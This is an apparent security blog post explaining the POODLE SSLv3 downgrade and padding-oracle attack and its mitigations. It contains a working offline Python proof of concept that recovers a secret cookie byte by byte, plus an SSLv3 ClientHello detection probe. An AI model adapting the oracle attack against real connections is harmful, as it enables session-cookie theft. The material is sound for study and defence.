On October 14th a new CVE was added to the ever-growing list of critical Transport Layer Security (TLS) vulnerabilities discovered in 2014. Dubbed "POODLE" (Padding Oracle On Downgraded Legacy Encryption), CVE-2014-3566 describes an attack that combines a protocol downgrade to SSLv3 with a padding-oracle weakness in that version's CBC-mode cipher suites. An active attacker can use it to recover parts of the encrypted SSL communication in plain text, such as secure cookies that carry session or authentication tokens and other critical data.
A downgrade attack is a common technique that relies on man-in-the-middle (MitM) conditions. An attacker who can alter the traffic between two parties can trick them into negotiating an earlier protocol version that both still support (e.g. TLSv1 instead of TLSv1.1, or SSLv3 instead of TLSv1) and then exploit other weaknesses of that version, such as a weak cipher suite or key length, to gain access to the secured communication. Previously well-known examples are the version rollback attacks. The handshake itself is largely protected against this: the Finished messages authenticate the negotiated version, and SSLv3 additionally contains a provision to prevent unnecessary downgrade to SSLv2. What is not protected is the fallback logic in clients. When a handshake fails, most browsers simply retry with the next lower version, so an attacker who deliberately breaks the TLSv1.x handshakes (for example by dropping them or injecting a TCP reset) can walk the client down to SSLv3 without the server ever seeing a tampered handshake.
POODLE combines that downgrade to SSLv3 with a padding-oracle attack on CBC-mode ciphers. In SSLv3 the MAC does not cover the padding and the receiver checks only the final pad-length byte, so an attacker who can make the victim's browser send many requests of attacker-chosen length can substitute ciphertext blocks and, from whether the server accepts or rejects each record, recover one byte of plaintext for roughly every 256 requests. Since the only non-CBC alternative in SSLv3 is RC4, which is already known to be weak, there is no safe SSLv3 cipher suite to fall back to; disabling SSLv3 entirely is the recommended mitigation for achieving the desired level of security over an encrypted connection. The TLS_FALLBACK_SCSV mechanism has also been recommended to prevent downgrade attacks: a client that includes this signalling cipher suite in a fallback handshake lets a server supporting a higher version reject the downgrade with an inappropriate_fallback alert. Its effectiveness, however, depends on both client and server implementing it. As of this posting only a few browsers support it, so it cannot be relied on to prevent POODLE attacks in all cases.
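The padding-oracle half of the attack, as an added example that is not from the original post or from HP: an offline Python model of SSLv3-style CBC records. A toy HMAC-based Feistel permutation stands in for the block cipher and HMAC-SHA1 for the SSLv3 record MAC (both assumptions made for the demo; the padding layout and the single pad-length check are SSLv3's). The Victim class plays both browser and server; the attacker only chooses request lengths, sees ciphertext, and learns whether the server accepted a record.

```python
# Added example, not code from the original post or from HP: an offline model of the
# POODLE padding oracle. Assumptions: a toy HMAC-based Feistel permutation stands in
# for the block cipher, HMAC-SHA1 for the SSLv3 record MAC, seeded randomness for IVs.
import hashlib
import hmac
import random

BLOCK = 16      # block size in bytes
MAC_LEN = 20    # SHA-1 sized MAC
ROUNDS = 4      # Feistel rounds (demo-only cipher)

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round_fn(key, i, half):
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, block):
    left, right = block[:8], block[8:]
    for i in range(ROUNDS):
        left, right = right, _xor(left, _round_fn(key, i, right))
    return left + right

def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for i in reversed(range(ROUNDS)):
        left, right = _xor(right, _round_fn(key, i, left)), left
    return left + right

def cbc_encrypt(key, iv, plaintext):
    out, prev = bytearray(), iv
    for off in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[off:off + BLOCK], prev))
        out += prev
    return bytes(out)

def cbc_decrypt(key, iv, ciphertext):
    out, prev = bytearray(), iv
    for off in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[off:off + BLOCK]
        out += _xor(block_decrypt(key, cur), prev)
        prev = cur
    return bytes(out)

class Victim:
    """Browser and server sharing one SSLv3 session. The attacker only picks request
    lengths, observes the ciphertext and learns whether the server accepted a record."""

    def __init__(self, secret, seed=2014):
        self.secret = secret
        self.rng = random.Random(seed)          # constructed: reproducible IVs and padding
        self.enc_key, self.mac_key = self._rand(16), self._rand(16)

    def _rand(self, n):
        return bytes(self.rng.getrandbits(8) for _ in range(n))

    def request(self, prefix_len, suffix_len):
        # Browser: attacker-chosen URL path, then the secret cookie, then attacker-chosen body.
        data = b"/" * prefix_len + self.secret + b"x" * suffix_len
        body = data + hmac.new(self.mac_key, data, hashlib.sha1).digest()
        pad_len = (BLOCK - (len(body) + 1) % BLOCK) % BLOCK
        body += self._rand(pad_len) + bytes([pad_len])  # SSLv3: pad bytes arbitrary, last = length
        iv = self._rand(BLOCK)
        return iv, cbc_encrypt(self.enc_key, iv, body)

    def accepts(self, iv, ciphertext):
        # SSLv3 receiver: checks only the pad-length byte, never the padding contents.
        plain = cbc_decrypt(self.enc_key, iv, ciphertext)
        pad_len = plain[-1]
        if pad_len + 1 > BLOCK or len(plain) < pad_len + 1 + MAC_LEN:
            return False
        stripped = plain[:-(pad_len + 1)]
        data, mac = stripped[:-MAC_LEN], stripped[-MAC_LEN:]
        return hmac.compare_digest(mac, hmac.new(self.mac_key, data, hashlib.sha1).digest())

def poodle_recover(victim, secret_len, max_tries=20000):
    """Recover the secret byte by byte; returns (secret, number of requests used)."""
    recovered, tries = bytearray(), 0
    for i in range(secret_len):
        prefix_len = (BLOCK - 1 - i) % BLOCK                        # secret[i] ends its block
        suffix_len = -(prefix_len + secret_len + MAC_LEN) % BLOCK   # final block is all padding
        target = (prefix_len + i) // BLOCK                          # block holding secret[i]
        for _ in range(max_tries):
            iv, ct = victim.request(prefix_len, suffix_len)
            tries += 1
            blocks = [iv] + [ct[o:o + BLOCK] for o in range(0, len(ct), BLOCK)]
            forged = ct[:-BLOCK] + blocks[target + 1]   # padding block := block with secret[i]
            if victim.accepts(iv, forged):
                # Accepted only if the decrypted last byte equals BLOCK-1; solve for secret[i].
                recovered.append((BLOCK - 1) ^ blocks[target][-1] ^ blocks[-2][-1])
                break
        else:
            raise RuntimeError("oracle never accepted; alignment is wrong")
    return bytes(recovered), tries

if __name__ == "__main__":
    cookie = b"auth=s3cr3t"                  # constructed secret
    print(poodle_recover(Victim(cookie), len(cookie)))
```

Each accepted record reveals one byte, and a record is accepted with probability 1/256 per request, so an 11-byte cookie costs on the order of 2,800 requests. The secret is shifted one byte at a time by changing the prefix length, which is what the attacker's injected JavaScript does with the URL path in the real attack.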
Security Research has added a check to WebInspect that detects SSLv3 support on the target server and lists the CBC-mode cipher suites it offers. Details of how to use this feature can be found on the Security blog.
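An added example (not WebInspect's check or any other HP code) of what such a detection check and the TLS_FALLBACK_SCSV behaviour look like on the wire: a Python script that builds an SSLv3 ClientHello offering only CBC suites, optionally with the signalling suite appended, and classifies the first record the server sends back. The cipher-suite values and the inappropriate_fallback alert code are the IANA and RFC 7507 assignments; build_server_hello is a constructed response used only to exercise the classifier offline, and probe() is an assumption about how one would wire the check to a live socket.

```python
# Added example, not HP/WebInspect code. Builds an SSLv3 ClientHello with CBC suites
# (optionally plus TLS_FALLBACK_SCSV) and classifies the server's first reply record.
import os
import socket
import struct

SSLV3 = b"\x03\x00"
TLS_FALLBACK_SCSV = b"\x56\x00"             # RFC 7507 signalling cipher suite value
HANDSHAKE, ALERT = 0x16, 0x15               # record content types
CLIENT_HELLO, SERVER_HELLO = 0x01, 0x02     # handshake message types
INAPPROPRIATE_FALLBACK = 86                 # alert description defined by RFC 7507

# IANA cipher-suite values commonly offered under SSLv3; RC4 suites deliberately omitted.
CBC_SUITES = {
    b"\x00\x0a": "SSL_RSA_WITH_3DES_EDE_CBC_SHA",
    b"\x00\x2f": "TLS_RSA_WITH_AES_128_CBC_SHA",
    b"\x00\x35": "TLS_RSA_WITH_AES_256_CBC_SHA",
}

def build_client_hello(version=SSLV3, suites=CBC_SUITES, fallback_scsv=False, client_random=None):
    """Minimal ClientHello record. SSLv3 has no extensions, so the body ends at compression."""
    client_random = client_random or os.urandom(32)
    suite_bytes = b"".join(suites) + (TLS_FALLBACK_SCSV if fallback_scsv else b"")
    body = (version + client_random + b"\x00"                  # version, random, empty session id
            + struct.pack(">H", len(suite_bytes)) + suite_bytes
            + b"\x01\x00")                                      # one compression method: null
    handshake = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([HANDSHAKE]) + version + struct.pack(">H", len(handshake)) + handshake

def build_server_hello(version, suite, server_random=None):
    """Constructed ServerHello, used here only to exercise classify_response offline."""
    server_random = server_random or os.urandom(32)
    body = version + server_random + b"\x00" + suite + b"\x00"  # empty session id, null compression
    handshake = bytes([SERVER_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([HANDSHAKE]) + version + struct.pack(">H", len(handshake)) + handshake

def classify_response(data):
    """Return (verdict, detail) for the first record a server sends after our ClientHello."""
    if len(data) < 5:
        return ("no_response", None)
    content_type = data[0]
    if content_type == ALERT and len(data) >= 7:
        description = data[6]
        if description == INAPPROPRIATE_FALLBACK:
            return ("refused_scsv", "inappropriate_fallback")   # server honours TLS_FALLBACK_SCSV
        return ("refused", description)
    if content_type == HANDSHAKE and len(data) >= 9 and data[5] == SERVER_HELLO:
        body = data[9:]                                          # skip record + handshake headers
        if len(body) >= 35:
            server_version = body[0:2]
            session_id_len = body[34]
            suite = body[35 + session_id_len:37 + session_id_len]
            if server_version == SSLV3 and suite in CBC_SUITES:
                return ("sslv3_cbc_accepted", CBC_SUITES[suite])  # the POODLE-exposed case
            if len(suite) == 2:
                return ("accepted", (server_version, suite))
    return ("unknown", content_type)

def probe(host, port=443, fallback_scsv=False, timeout=5.0):
    """Send the ClientHello to a live server and classify the reply (assumption: direct TCP)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_client_hello(fallback_scsv=fallback_scsv))
        return classify_response(sock.recv(4096))
```

A server that answers the plain SSLv3 ClientHello with a ServerHello selecting a CBC suite is exposed; the same probe sent with fallback_scsv=True should come back as refused_scsv from a server that implements RFC 7507, and a server that simply has SSLv3 disabled answers with a handshake_failure (40) or protocol_version alert, or closes the connection.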